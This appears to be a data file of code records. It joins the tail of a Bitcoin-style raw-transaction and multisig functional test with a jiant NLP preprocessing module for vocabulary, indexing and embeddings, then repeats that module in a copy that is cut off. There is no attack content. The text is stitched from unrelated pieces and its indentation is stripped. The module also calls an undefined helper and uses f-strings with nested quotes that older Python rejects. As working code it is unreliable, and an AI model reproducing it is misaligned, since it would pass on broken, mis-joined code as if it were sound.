mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{"txid": txId, "vout": vout['n'], "scriptPubKey": vout['scriptPubKey']['hex'], "redeemScript": mSigObjValid['hex'], "amount": vout['value']}]
outputs = {self.nodes[0].getnewaddress(): 2.19}
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned1)
assert_equal(rawTxPartialSigned1['complete'], False) # node1 only has one key, can't comp. sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) # node2 only has one key, can't comp. sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.debug(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal + Decimal('50.00000000') + Decimal('2.19000000')) # block reward + tx
if __name__ == '__main__':
RawTransactionsTest().main()
|
"""Preprocessing functions and pipeline
The pipeline is three steps
1) create / load tasks, which includes
a) load raw data
b) tokenize raw data
2) create / load all vocabularies (word, char, task-specific target vocabs)
a) count tokens of a vocab
b) take the N most frequent tokens
3) index all the data using appropriate indexers
We save indexed data to streamable Records to save memory.
"""
import _pickle as pkl # :(
import copy
import io
import logging as log
import os
import sys
from collections import defaultdict
import numpy as np
import torch
from allennlp.data import Vocabulary
from allennlp.data.token_indexers import (
ELMoTokenCharactersIndexer,
SingleIdTokenIndexer,
TokenCharactersIndexer,
)
from jiant.tasks import (
ALL_DIAGNOSTICS,
ALL_COLA_NPI_TASKS,
ALL_GLUE_TASKS,
ALL_SUPERGLUE_TASKS,
ALL_NLI_PROBING_TASKS,
)
from jiant.tasks import REGISTRY as TASKS_REGISTRY
from jiant.utils import config, serialize, utils
# NOTE: these are not that same as AllenNLP SOS, EOS tokens
SOS_TOK, EOS_TOK = "<SOS>", "<EOS>"
# NOTE: pad and unk tokens are created by AllenNLP vocabs by default
SPECIALS = [SOS_TOK, EOS_TOK]
UNK_TOK = "@@UNKNOWN@@" # AllenNLP unk token
ALL_SPLITS = ["train", "val", "test"]
def _get_serialized_record_path(task_name, split, preproc_dir):
"""Get the canonical path for a serialized task split."""
serialized_record_path = os.path.join(preproc_dir, "{:s}__{:s}_data".format(task_name, split))
return serialized_record_path
def _get_instance_generator(task_name, split, preproc_dir, fraction=None):
"""Get a lazy generator for the given task and split.
Args:
task_name: (string), task name
split: (string), split name ('train', 'val', or 'test')
preproc_dir: (string) path to preprocessing dir
fraction: if set to a float between 0 and 1, load only the specified percentage
of examples. Hashing is used to ensure that the same examples are loaded each
epoch.
Returns:
serialize.RepeatableIterator yielding Instance objects
"""
filename = _get_serialized_record_path(task_name, split, preproc_dir)
assert os.path.isfile(filename), "Record file '%s' not found!" % filename
return serialize.read_records(filename, repeatable=True, fraction=fraction)
def _indexed_instance_generator(instance_iter, vocab):
"""Yield indexed instances. Instances are modified in-place.
TODO(iftenney): multiprocess the $%^& out of this.
Args:
instance_iter: iterable(Instance) of examples
vocab: Vocabulary for use in indexing
Yields:
Instance with indexed fields.
"""
for instance in instance_iter:
instance.index_fields(vocab)
# Strip token fields to save memory and disk.
del_field_tokens(instance)
yield instance
def del_field_tokens(instance):
""" Save memory by deleting the tokens that will no longer be used.
Only works if Instances have fields 'input1' and 'input2'.
All other fields will keep their tokens in memory.
Args:
instance: AllenNLP Instance. Modified in-place.
"""
if "input1" in instance.fields:
field = instance.fields["input1"]
del field.tokens
if "input2" in instance.fields:
field = instance.fields["input2"]
del field.tokens
def _index_split(task, split, indexers, vocab, record_file):
"""Index instances and stream to disk.
Args:
task: Task instance
split: (string), 'train', 'val', or 'test'
indexers: dict of token indexers
vocab: Vocabulary instance
record_file: (string) file to write serialized Instances to
"""
log_prefix = "\tTask %s (%s)" % (task.name, split)
log.info("%s: Indexing from scratch.", log_prefix)
split_text = task.get_split_text(split)
instance_iter = task.process_split(split_text, indexers)
if hasattr(instance_iter, "__len__"): # if non-lazy
log.warn(
"%s: non-lazy Instance generation. You'll want to refactor "
"%s.process_split to return a lazy iterator.",
log_prefix,
type(task).__name__,
)
log.info("%s: %d examples to index", log_prefix, len(instance_iter))
# Copy so that we don't store indexed data in memory.
# TODO: remove this case and stream everything.
instance_iter = utils.copy_iter(instance_iter)
# Counter for lazy-loaded data, so we can log the # of elements.
_instance_counter = 0
def _counter_iter(elems):
nonlocal _instance_counter
for elem in elems:
_instance_counter += 1
yield elem
instance_iter = _counter_iter(instance_iter)
# Actually call generators and stream to disk.
serialize.write_records(_indexed_instance_generator(instance_iter, vocab), record_file)
log.info("%s: Saved %d instances to %s", log_prefix, _instance_counter, record_file)
def _find_cached_file(
exp_dir: str, global_exp_cache_dir: str, relative_path: str, log_prefix: str = ""
) -> bool:
"""Find a cached file.
Look in local exp_dir first, then in global_exp_cache_dir. If found in the
global dir, make a symlink in the local dir pointing to the global one.
Args:
exp_dir: (string) local experiment dir
global_exp_cache_dir: (string) global experiment cache
relative_path: (string) relative path to file, from exp_dir
log_prefix: (string) prefix for logging info
Returns:
True if file was found in either location.
"""
if log_prefix:
log_prefix = log_prefix + ": "
# Try in local preproc dir.
local_file = os.path.join(exp_dir, relative_path)
if os.path.isfile(local_file) or os.path.islink(local_file):
log.info("%sFound preprocessed copy in %s", log_prefix, local_file)
return True
# Try in global preproc dir; if found, make a symlink.
global_file = os.path.join(global_exp_cache_dir, relative_path)
if os.path.exists(global_file):
log.info("%sFound (global) preprocessed copy in %s", log_prefix, global_file)
os.symlink(global_file, local_file)
log.info("%sCreated symlink: %s -> %s", log_prefix, local_file, global_file)
return True
return False
def _build_embeddings(args, vocab, emb_file: str):
""" Build word embeddings from scratch (as opposed to loading them from a pickle),
using precomputed fastText / GloVe embeddings. """
# Load all the word embeddings based on vocabulary
log.info("\tBuilding embeddings from scratch.")
word_v_size, unk_idx = vocab.get_vocab_size("tokens"), vocab.get_token_index(vocab._oov_token)
embeddings = np.random.randn(word_v_size, args.d_word)
with io.open(
args.word_embs_file, "r", encoding="utf-8", newline="\n", errors="ignore"
) as vec_fh:
for line in vec_fh:
word, vec = line.split(" ", 1)
idx = vocab.get_token_index(word)
if idx != unk_idx:
embeddings[idx] = np.array(list(map(float, vec.split())))
embeddings[vocab.get_token_index(vocab._padding_token)] = 0.0
embeddings = torch.FloatTensor(embeddings)
log.info("\tFinished loading embeddings")
# Save/cache the word embeddings
pkl.dump(embeddings, open(emb_file, "wb"))
log.info("\tSaved embeddings to %s", emb_file)
return embeddings
def _build_vocab(args, tasks, vocab_path: str):
""" Build vocabulary from scratch, reading data from tasks. """
# NOTE: task-specific target vocabulary should be counted in the task object
# and provided via `task.all_labels()`. The namespace should be task-specific,
# i.e. not something generic like "targets".
log.info("\tBuilding vocab from scratch.")
max_v_sizes = {"word": args.max_word_v_size, "char": args.max_char_v_size}
word2freq, char2freq = get_words(tasks)
vocab = get_vocab(word2freq, char2freq, max_v_sizes)
for task in tasks: # add custom label namespaces
add_task_label_vocab(vocab, task)
if args.force_include_wsj_vocabulary:
# Add WSJ full vocabulary for PTB F1 parsing tasks.
add_wsj_vocab(vocab, args.data_dir)
if args.input_module == "gpt":
# Add pre-computed BPE vocabulary for OpenAI transformer model.
add_openai_bpe_vocab(vocab, "openai_bpe")
if args.input_module.startswith("bert"):
# Add pre-computed BPE vocabulary for BERT model.
add_bert_wpm_vocab(vocab, args.input_module)
vocab.save_to_files(vocab_path)
log.info("\tSaved vocab to %s", vocab_path)
# del word2freq, char2freq, target2freq
def build_indexers(args):
indexers = {}
if not args.input_module.startswith("bert") and args.input_module not in ["elmo", "gpt"]:
indexers["words"] = SingleIdTokenIndexer()
if args.input_module == "elmo":
indexers["elmo"] = ELMoTokenCharactersIndexer("elmo")
assert args.tokenizer in {"", "MosesTokenizer"}
if args.char_embs:
indexers["chars"] = TokenCharactersIndexer("chars")
if args.cove:
assert args.tokenizer == "MosesTokenizer", (
f"CoVe model expects Moses tokenization (MosesTokenizer);"
" you are using args.tokenizer = {args.tokenizer}"
)
if args.input_module == "gpt":
assert (
not indexers
), "OpenAI transformer is not supported alongside other indexers due to tokenization."
assert (
args.tokenizer == "OpenAI.BPE"
), "OpenAI transformer uses custom BPE tokenization. Set tokenizer=OpenAI.BPE."
indexers["openai_bpe_pretokenized"] = SingleIdTokenIndexer("openai_bpe")
if args.input_module.startswith("bert"):
assert not indexers, "BERT is not supported alongside other indexers due to tokenization."
assert args.tokenizer == args.input_module, (
"BERT models use custom WPM tokenization for "
"each model, so tokenizer must match the "
"specified BERT model."
)
indexers["bert_wpm_pretokenized"] = SingleIdTokenIndexer(args.input_module)
return indexers
def build_tasks(args):
"""Main logic for preparing tasks, doing so by
1) creating / loading the tasks
2) building / loading the vocabulary
3) building / loading the word vectors
4) indexing each task's data
5) initializing lazy loaders (streaming iterators)
"""
# 1) create / load tasks
tasks, pretrain_task_names, target_task_names = get_tasks(args)
for task in tasks:
task_classifier = config.get_task_attr(args, task.name, "use_classifier")
setattr(task, "_classifier_name", task_classifier if task_classifier else task.name)
tokenizer_names = {task.name: task.tokenizer_name for task in tasks}
assert len(set(tokenizer_names.values())) == 1, (
f"Error: mixing tasks with different tokenizers!" " Tokenizations: {tokenizer_names:s}"
)
# 2) build / load vocab and indexers
indexers = build_indexers(args)
vocab_path = os.path.join(args.exp_dir, "vocab")
if args.reload_vocab or not os.path.exists(vocab_path):
_build_vocab(args, tasks, vocab_path)
# Always load vocab from file.
vocab = Vocabulary.from_files(vocab_path)
log.info("\tLoaded vocab from %s", vocab_path)
for namespace, mapping in vocab._index_to_token.items():
log.info("\tVocab namespace %s: size %d", namespace, len(mapping))
log.info("\tFinished building vocab.")
args.max_word_v_size = vocab.get_vocab_size("tokens")
args.max_char_v_size = vocab.get_vocab_size("chars")
# 3) build / load word vectors
word_embs = None
if args.input_module not in ["elmo", "gpt", "scratch"] and not args.input_module.startswith(
"bert"
):
emb_file = os.path.join(args.exp_dir, "embs.pkl")
if args.reload_vocab or not os.path.exists(emb_file):
word_embs = _build_embeddings(args, vocab, emb_file)
else: # load from file
word_embs = pkl.load(open(emb_file, "rb"))
log.info("Trimmed word embeddings: %s", str(word_embs.size()))
# 4) Index tasks using vocab (if preprocessed copy not available).
preproc_dir = os.path.join(args.exp_dir, "preproc")
utils.maybe_make_dir(preproc_dir)
reindex_tasks = parse_task_list_arg(args.reindex_tasks)
utils.assert_for_log(
not (args.reload_indexing and not reindex_tasks),
'Flag reload_indexing was set, but no tasks are set to reindex (use -o "args.reindex_tasks'
' = "task1,task2,..."")',
)
for task in tasks:
force_reindex = args.reload_indexing and task.name in reindex_tasks
for split in ALL_SPLITS:
log_prefix = "\tTask '%s', split '%s'" % (task.name, split)
relative_path = _get_serialized_record_path(task.name, split, "preproc")
cache_found = _find_cached_file(
args.exp_dir, args.global_ro_exp_dir, relative_path, log_prefix=log_prefix
)
if force_reindex or not cache_found:
# Re-index from scratch.
record_file = _get_serialized_record_path(task.name, split, preproc_dir)
if os.path.exists(record_file) and os.path.islink(record_file):
os.remove(record_file)
_index_split(task, split, indexers, vocab, record_file)
# Delete in-memory data - we'll lazy-load from disk later.
# TODO: delete task.{split}_data_text as well?
task.train_data = None
task.val_data = None
task.test_data = None
log.info("\tFinished indexing tasks")
# 5) Initialize tasks with data iterators.
pretrain_tasks = []
target_tasks = []
for task in tasks:
# Replace lists of instances with lazy generators from disk.
task.val_data = _get_instance_generator(task.name, "val", preproc_dir)
task.test_data = _get_instance_generator(task.name, "test", preproc_dir)
# When using pretrain_data_fraction, we need modified iterators for use
# only on training datasets at pretraining time.
if task.name in pretrain_task_names:
log.info("\tCreating trimmed pretraining-only version of " + task.name + " train.")
task.pretrain_fraction = float(args.get(f"pretrain_{(task.name).replace("-", "_")}_fraction", 1.0))
#task.pretrain_fraction = args.pretrain_data_fraction # Original
log.info(f"Task {task.name} instance generator using {task.pretrain_fraction * 100}% of training data.")
task.train_data = _get_instance_generator(
task.name, "train", preproc_dir, fraction=task.pretrain_fraction
)
pretrain_tasks.append(task)
# When using target_train_data_fraction, we need modified iterators
# only for training datasets at do_target_task_training time.
if task.name in target_task_names:
log.info("\tCreating trimmed target-only version of " + task.name + " train.")
task.target_train_fraction = float(args.get(f"target_train_{(task.name).replace("-", "_")}_fraction", 1.0))
#task.target_train_fraction = args.target_train_data_fraction # Original
task.train_data = _get_instance_generator(
task.name, "train", preproc_dir, fraction=task.target_train_fraction
)
target_tasks.append(task)
log.info("\t Training on %s", ", ".join(pretrain_task_names))
log.info("\t Evaluating on %s", ", ".join(target_task_names))
return pretrain_tasks, target_tasks, vocab, word_embs
def parse_task_list_arg(task_list):
"""Parse task list argument into a list of task names."""
task_names = []
for task_name in task_list.split(","):
if task_name == "glue":
task_names.extend(ALL_GLUE_TASKS)
elif task_name == "superglue":
task_names.extend(ALL_SUPERGLUE_TASKS)
elif task_name == "none" or task_name == "":
continue
else:
task_names.append(task_name)
return task_names
def _get_task(name, args, data_path, scratch_path):
""" Build or load a single task. """
assert name in TASKS_REGISTRY, f"Task '{name:s}' not found!"
task_cls, rel_path, task_kw = TASKS_REGISTRY[name]
pkl_path = os.path.join(scratch_path, "tasks", f"{name:s}.{args.tokenizer:s}.pkl")
# TODO: refactor to always read from disk, even if task is constructed
# here. This should avoid subtle bugs from deserialization issues.
if os.path.isfile(pkl_path) and not args.reload_tasks:
task = pkl.load(open(pkl_path, "rb"))
log.info("\tLoaded existing task %s", name)
else:
log.info("\tCreating task %s from scratch.", name)
# These tasks take an additional kwarg.
if name == "nli-prob" or name == "nli-alt":
# TODO: remove special case, replace with something general
# to pass custom loader args to task.
task_kw["probe_path"] = args["nli-prob"].probe_path
task_src_path = os.path.join(data_path, rel_path)
task = task_cls(
task_src_path,
max_seq_len=args.max_seq_len,
name=name,
tokenizer_name=args.tokenizer,
**task_kw,
)
task.load_data()
utils.maybe_make_dir(os.path.dirname(pkl_path))
pkl.dump(task, open(pkl_path, "wb"))
return task
def get_task_without_loading_data(task_name, args):
""" Build a task without loading data """
task_cls, rel_path, task_kw = TASKS_REGISTRY[task_name]
task = task_cls(
path=None,
max_seq_len=args.max_seq_len,
name=task_name,
tokenizer_name=args.tokenizer,
**task_kw,
)
return task
def get_tasks(args):
""" Actually build or load (from pickles) the tasks. """
data_path = args.data_dir
scratch_path = args.exp_dir
pretrain_task_names = parse_task_list_arg(args.pretrain_tasks)
target_task_names = parse_task_list_arg(args.target_tasks)
# TODO: We don't want diagnostic tasks in train_task_names
# but want to support glue/superglue task macros.
pretrain_task_names = list(filter(lambda x: x not in ALL_DIAGNOSTICS, pretrain_task_names))
task_names = sorted(set(pretrain_task_names + target_task_names))
assert data_path is not None
scratch_path = scratch_path or data_path
log.info("Writing pre-preprocessed tasks to %s", scratch_path)
tasks = []
for name in task_names:
task = _get_task(name, args, data_path=data_path, scratch_path=scratch_path)
tasks.append(task)
# Count examples, store in example_counts.
if task.example_counts is None:
task.count_examples()
log.info(
"\tTask '%s': %s",
task.name,
" ".join(("|%s|=%d" % kv for kv in task.example_counts.items())),
)
log.info("\tFinished loading tasks: %s.", " ".join([task.name for task in tasks]))
return tasks, pretrain_task_names, target_task_names
def get_words(tasks):
"""
Get all words for all tasks for all splits for all sentences
Return dictionary mapping words to frequencies.
"""
word2freq, char2freq = defaultdict(int), defaultdict(int)
def update_vocab_freqs(sentence):
"""Update counts for words in the sentence"""
for word in sentence:
word2freq[word] += 1
for char in list(word):
char2freq[char] += 1
return
for task in tasks:
log.info("\tCounting words for task %s.", task.name)
for sentence in task.get_sentences():
update_vocab_freqs(sentence)
# This branch is meant for tasks that have *English* target sentences
# (or more generally, same language source and target sentences)
# Tasks with different language source and target sentences should
# count and return the vocab in a `task.all_labels()` method.
for task in tasks:
if hasattr(task, "target_sentences"):
for sentence in task.target_sentences:
update_target_vocab_freqs(sentence)
return word2freq, char2freq
def get_vocab(word2freq, char2freq, max_v_sizes):
"""Build vocabulary by selecting the most frequent tokens"""
vocab = Vocabulary(counter=None, max_vocab_size=max_v_sizes)
for special in SPECIALS:
vocab.add_token_to_namespace(special, "tokens")
words_by_freq = [(word, freq) for word, freq in word2freq.items()]
words_by_freq.sort(key=lambda x: x[1], reverse=True)
for word, _ in words_by_freq[: max_v_sizes["word"]]:
vocab.add_token_to_namespace(word, "tokens")
chars_by_freq = [(char, freq) for char, freq in char2freq.items()]
chars_by_freq.sort(key=lambda x: x[1], reverse=True)
for char, _ in chars_by_freq[: max_v_sizes["char"]]:
vocab.add_token_to_namespace(char, "chars")
return vocab
def add_task_label_vocab(vocab, task):
"""Add custom task labels to a separate namespace.
If task has a 'get_all_labels' method, call that to get a list of labels
to populate the <task_name>_labels vocabulary namespace.
This is the recommended way to implement multiclass models: in your task's
process_split code, make instances that use LabelFields with the task label
namespace, e.g.:
label_namespace = "%s_labels" % self.name
label = LabelField(label_string, label_namespace=label_namespace)
This will cause them to be properly indexed by the Vocabulary.
This can then be accessed when generating Instances, either via a custom
Indexer or by invoking the namespace when creating a LabelField.
"""
if not hasattr(task, "get_all_labels"):
return
utils.assert_for_log(
hasattr(task, "_label_namespace"),
"Task %s is missing method `_label_namespace`!" % task.name,
)
namespace = task._label_namespace
if namespace is None:
return
log.info("\tTask '%s': adding vocab namespace '%s'", task.name, namespace)
for label in task.get_all_labels():
vocab.add_token_to_namespace(label, namespace)
def add_bert_wpm_vocab(vocab, bert_model_name):
"""Add BERT WPM vocabulary for use with pre-tokenized data.
BertTokenizer has a convert_tokens_to_ids method, but this doesn't do
anything special so we can just use the standard indexers.
"""
from pytorch_pretrained_bert import BertTokenizer
do_lower_case = "uncased" in bert_model_name
tokenizer = BertTokenizer.from_pretrained(bert_model_name, do_lower_case=do_lower_case)
ordered_vocab = tokenizer.convert_ids_to_tokens(range(len(tokenizer.vocab)))
log.info("BERT WPM vocab (model=%s): %d tokens", bert_model_name, len(ordered_vocab))
for word in ordered_vocab:
vocab.add_token_to_namespace(word, bert_model_name)
def add_openai_bpe_vocab(vocab, namespace="openai_bpe"):
"""Add OpenAI BPE vocabulary for use with pre-tokenized data."""
from .openai_transformer_lm import utils as openai_utils
id_to_wordpiece = openai_utils.reverse_encoder_dict
for i in range(len(id_to_wordpiece)):
vocab.add_token_to_namespace(id_to_wordpiece[i], namespace)
# Add SOS and EOS tokens to *end* of namespace, since this is where the
# OpenAI model expects special tokens.
vocab.add_token_to_namespace(utils.SOS_TOK, namespace)
vocab.add_token_to_namespace(utils.EOS_TOK, namespace)
def add_wsj_vocab(vocab, data_dir, namespace="tokens"):
"""Add WSJ vocabulary for PTB parsing models."""
wsj_vocab_path = os.path.join(data_dir, "WSJ/tokens.txt")
# To create the tokens.txt file: Run only WSJ LM baseline on jiant, and
# duplicate the vocab file generated.
assert os.path.exists(wsj_vocab_path), "WSJ vocab file doesn't exist."
wsj_tokens = open(wsj_vocab_path)
for line in wsj_tokens.readlines():
vocab.add_token_to_namespace(line.strip(), namespace)
log.info("\tAdded WSJ vocabulary from %s", wsj_tokens)
| """Preprocessing functions and pipeline
The pipeline is three steps
1) create / load tasks, which includes
a) load raw data
b) tokenize raw data
2) create / load all vocabularies (word, char, task-specific target vocabs)
a) count tokens of a vocab
b) take the N most frequent tokens
3) index all the data using appropriate indexers
We save indexed data to streamable Records to save memory.
"""
import _pickle as pkl # :(
import copy
import io
import logging as log
import os
import sys
from collections import defaultdict
import numpy as np
import torch
from allennlp.data import Vocabulary
from allennlp.data.token_indexers import (
ELMoTokenCharactersIndexer,
SingleIdTokenIndexer,
TokenCharactersIndexer,
)
from jiant.tasks import (
ALL_DIAGNOSTICS,
ALL_COLA_NPI_TASKS,
ALL_GLUE_TASKS,
ALL_SUPERGLUE_TASKS,
ALL_NLI_PROBING_TASKS,
)
from jiant.tasks import REGISTRY as TASKS_REGISTRY
from jiant.utils import config, serialize, utils
# NOTE: these are not that same as AllenNLP SOS, EOS tokens
SOS_TOK, EOS_TOK = "<SOS>", "<EOS>"
# NOTE: pad and unk tokens are created by AllenNLP vocabs by default
SPECIALS = [SOS_TOK, EOS_TOK]
UNK_TOK = "@@UNKNOWN@@" # AllenNLP unk token
ALL_SPLITS = ["train", "val", "test"]
def _get_serialized_record_path(task_name, split, preproc_dir):
"""Get the canonical path for a serialized task split."""
serialized_record_path = os.path.join(preproc_dir, "{:s}__{:s}_data".format(task_name, split))
return serialized_record_path
def _get_instance_generator(task_name, split, preproc_dir, fraction=None):
"""Get a lazy generator for the given task and split.
Args:
task_name: (string), task name
split: (string), split name ('train', 'val', or 'test')
preproc_dir: (string) path to preprocessing dir
fraction: if set to a float between 0 and 1, load only the specified percentage
of examples. Hashing is used to ensure that the same examples are loaded each
epoch.
Returns:
serialize.RepeatableIterator yielding Instance objects
"""
filename = _get_serialized_record_path(task_name, split, preproc_dir)
assert os.path.isfile(filename), "Record file '%s' not found!" % filename
return serialize.read_records(filename, repeatable=True, fraction=fraction)
def _indexed_instance_generator(instance_iter, vocab):
"""Yield indexed instances. Instances are modified in-place.
TODO(iftenney): multiprocess the $%^& out of this.
Args:
instance_iter: iterable(Instance) of examples
vocab: Vocabulary for use in indexing
Yields:
Instance with indexed fields.
"""
for instance in instance_iter:
instance.index_fields(vocab)
# Strip token fields to save memory and disk.
del_field_tokens(instance)
yield instance
def del_field_tokens(instance):
""" Save memory by deleting the tokens that will no longer be used.
Only works if Instances have fields 'input1' and 'input2'.
All other fields will keep their tokens in memory.
Args:
instance: AllenNLP Instance. Modified in-place.
"""
if "input1" in instance.fields:
field = instance.fields["input1"]
del field.tokens
if "input2" in instance.fields:
field = instance.fields["input2"]
del field.tokens
def _index_split(task, split, indexers, vocab, record_file):
"""Index instances and stream to disk.
Args:
task: Task instance
split: (string), 'train', 'val', or 'test'
indexers: dict of token indexers
vocab: Vocabulary instance
record_file: (string) file to write serialized Instances to
"""
log_prefix = "\tTask %s (%s)" % (task.name, split)
log.info("%s: Indexing from scratch.", log_prefix)
split_text = task.get_split_text(split)
instance_iter = task.process_split(split_text, indexers)
if hasattr(instance_iter, "__len__"): # if non-lazy
log.warn(
"%s: non-lazy Instance generation. You'll want to refactor "
"%s.process_split to return a lazy iterator.",
log_prefix,
type(task).__name__,
)
log.info("%s: %d examples to index", log_prefix, len(instance_iter))
# Copy so that we don't store indexed data in memory.
# TODO: remove this case and stream everything.
instance_iter = utils.copy_iter(instance_iter)
# Counter for lazy-loaded data, so we can log the # of elements.
_instance_counter = 0
def _counter_iter(elems):
nonlocal _instance_counter
for elem in elems:
_instance_counter += 1
yield elem
instance_iter = _counter_iter(instance_iter)
# Actually call generators and stream to disk.
serialize.write_records(_indexed_instance_generator(instance_iter, vocab), record_file)
log.info("%s: Saved %d instances to %s", log_prefix, _instance_counter, record_file)
def _find_cached_file(
exp_dir: str, global_exp_cache_dir: str, relative_path: str, log_prefix: str = ""
) -> bool:
"""Find a cached file.
Look in local exp_dir first, then in global_exp_cache_dir. If found in the
global dir, make a symlink in the local dir pointing to the global one.
Args:
exp_dir: (string) local experiment dir
global_exp_cache_dir: (string) global experiment cache
relative_path: (string) relative path to file, from exp_dir
log_prefix: (string) prefix for logging info
Returns:
True if file was found in either location.
"""
if log_prefix:
log_prefix = log_prefix + ": "
# Try in local preproc dir.
local_file = os.path.join(exp_dir, relative_path)
if os.path.isfile(local_file) or os.path.islink(local_file):
log.info("%sFound preprocessed copy in %s", log_prefix, local_file)
return True
# Try in global preproc dir; if found, make a symlink.
global_file = os.path.join(global_exp_cache_dir, relative_path)
if os.path.exists(global_file):
log.info("%sFound (global) preprocessed copy in %s", log_prefix, global_file)
os.symlink(global_file, local_file)
log.info("%sCreated symlink: %s -> %s", log_prefix, local_file, global_file)
return True
return False
def _build_embeddings(args, vocab, emb_file: str):
""" Build word embeddings from scratch (as opposed to loading them from a pickle),
using precomputed fastText / GloVe embeddings. """
# Load all the word embeddings based on vocabulary
log.info("\tBuilding embeddings from scratch.")
word_v_size, unk_idx = vocab.get_vocab_size("tokens"), vocab.get_token_index(vocab._oov_token)
embeddings = np.random.randn(word_v_size, args.d_word)
with io.open(
args.word_embs_file, "r", encoding="utf-8", newline="\n", errors="ignore"
) as vec_fh:
for line in vec_fh:
word, vec = line.split(" ", 1)
idx = vocab.get_token_index(word)
if idx != unk_idx:
embeddings[idx] = np.array(list(map(float, vec.split())))
embeddings[vocab.get_token_index(vocab._padding_token)] = 0.0
embeddings = torch.FloatTensor(embeddings)
log.info("\tFinished loading embeddings")
# Save/cache the word embeddings
pkl.dump(embeddings, open(emb_file, "wb"))
log.info("\tSaved embeddings to %s", emb_file)
return embeddings
def _build_vocab(args, tasks, vocab_path: str):
""" Build vocabulary from scratch, reading data from tasks. """
# NOTE: task-specific target vocabulary should be counted in the task object
# and provided via `task.all_labels()`. The namespace should be task-specific,
# i.e. not something generic like "targets".
log.info("\tBuilding vocab from scratch.")
max_v_sizes = {"word": args.max_word_v_size, "char": args.max_char_v_size}
word2freq, char2freq = get_words(tasks)
vocab = get_vocab(word2freq, char2freq, max_v_sizes)
for task in tasks: # add custom label namespaces
add_task_label_vocab(vocab, task)
if args.force_include_wsj_vocabulary:
# Add WSJ full vocabulary for PTB F1 parsing tasks.
add_wsj_vocab(vocab, args.data_dir)
if args.input_module == "gpt":
# Add pre-computed BPE vocabulary for OpenAI transformer model.
add_openai_bpe_vocab(vocab, "openai_bpe")
if args.input_module.startswith("bert"):
# Add pre-computed BPE vocabulary for BERT model.
add_bert_wpm_vocab(vocab, args.input_module)
vocab.save_to_files(vocab_path)
log.info("\tSaved vocab to %s", vocab_path)
# del word2freq, char2freq, target2freq
def build_indexers(args):
indexers = {}
if not args.input_module.startswith("bert") and args.input_module not in ["elmo", "gpt"]:
indexers["words"] = SingleIdTokenIndexer()
if args.input_module == "elmo":
indexers["elmo"] = ELMoTokenCharactersIndexer("elmo")
assert args.tokenizer in {"", "MosesTokenizer"}
if args.char_embs:
indexers["chars"] = TokenCharactersIndexer("chars")
if args.cove:
assert args.tokenizer == "MosesTokenizer", (
f"CoVe model expects Moses tokenization (MosesTokenizer);"
" you are using args.tokenizer = {args.tokenizer}"
)
if args.input_module == "gpt":
assert (
not indexers
), "OpenAI transformer is not supported alongside other indexers due to tokenization."
assert (
args.tokenizer == "OpenAI.BPE"
), "OpenAI transformer uses custom BPE tokenization. Set tokenizer=OpenAI.BPE."
indexers["openai_bpe_pretokenized"] = SingleIdTokenIndexer("openai_bpe")
if args.input_module.startswith("bert"):
assert not indexers, "BERT is not supported alongside other indexers due to tokenization."
assert args.tokenizer == args.input_module, (
"BERT models use custom WPM tokenization for "
"each model, so tokenizer must match the "
"specified BERT model."
)
indexers["bert_wpm_pretokenized"] = SingleIdTokenIndexer(args.input_module)
return indexers
def build_tasks(args):
"""Main logic for preparing tasks, doing so by
1) creating / loading the tasks
2) building / loading the vocabulary
3) building / loading the word vectors
4) indexing each task's data
5) initializing lazy loaders (streaming iterators)
"""
# 1) create / load tasks
tasks, pretrain_task_names, target_task_names = get_tasks(args)
for task in tasks:
task_classifier = config.get_task_attr(args, task.name, "use_classifier")
setattr(task, "_classifier_name", task_classifier if task_classifier else task.name)
tokenizer_names = {task.name: task.tokenizer_name for task in tasks}
assert len(set(tokenizer_names.values())) == 1, (
f"Error: mixing tasks with different tokenizers!" " Tokenizations: {tokenizer_names:s}"
)
# 2) build / load vocab and indexers
indexers = build_indexers(args)
vocab_path = os.path.join(args.exp_dir, "vocab")
if args.reload_vocab or not os.path.exists(vocab_path):
_build_vocab(args, tasks, vocab_path)
# Always load vocab from file.
vocab = Vocabulary.from_files(vocab_path)
log.info("\tLoaded vocab from %s", vocab_path)
for namespace, mapping in vocab._index_to_token.items():
log.info("\tVocab namespace %s: size %d", namespace, len(mapping))
log.info("\tFinished building vocab.")
args.max_word_v_size = vocab.get_vocab_size("tokens")
args.max_char_v_size = vocab.get_vocab_size("chars")
# 3) build / load word vectors
word_embs = None
if args.input_module not in ["elmo", "gpt", "scratch"] and not args.input_module.startswith(
"bert"
):
emb_file = os.path.join(args.exp_dir, "embs.pkl")
if args.reload_vocab or not os.path.exists(emb_file):
word_embs = _build_embeddings(args, vocab, emb_file)
else: # load from file
word_embs = pkl.load(open(emb_file, "rb"))
log.info("Trimmed word embeddings: %s", str(word_embs.size()))
# 4) Index tasks using vocab (if preprocessed copy not available).
preproc_dir = os.path.join(args.exp_dir, "preproc")
utils.maybe_make_dir(preproc_dir)
reindex_tasks = parse_task_list_arg(args.reindex_tasks)
utils.assert_for_log(
not (args.reload_indexing and not reindex_tasks),
'Flag reload_indexing was set, but no tasks are set to reindex (use -o "args.reindex_tasks'
' = "task1,task2,..."")',
)
for task in tasks:
force_reindex = args.reload_indexing and task.name in reindex_tasks
for split in ALL_SPLITS:
log_prefix = "\tTask '%s', split '%s'" % (task.name, split)
relative_path = _get_serialized_record_path(task.name, split, "preproc")
